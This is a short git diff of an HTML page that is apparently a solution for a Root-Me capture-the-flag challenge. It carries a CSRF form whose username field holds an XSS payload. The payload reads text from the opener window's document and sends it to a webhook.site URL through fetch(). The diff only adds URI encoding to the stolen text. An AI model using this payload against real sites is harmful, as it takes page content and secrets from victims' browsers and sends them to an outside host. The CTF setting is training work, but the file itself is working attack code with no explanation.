--- a/windowed/second_shared_context.html
+++ b/windowed/second_shared_context.html
@@ -8,7 +8,7 @@
 
 <h1>CSRF</h1>
 <form method="POST" action="http://challenge01.root-me.org:58003/login">
-  <input type="text" name="username" value="<script>fetch('https://webhook.site/0a33c9c6-2caf-4140-9d00-a651080fe455?g6g='+window.opener.document.querySelectorAll('section > p')[2].innerHTML)</script>">
+  <input type="text" name="username" value="<script>fetch('https://webhook.site/0a33c9c6-2caf-4140-9d00-a651080fe455?g6g='+encodeURI(window.opener.document.querySelectorAll('section>p')[2].innerHTML))</script>">
   <input type="text" name="secret" value="FAILED">
   <input type="submit">
 </form>
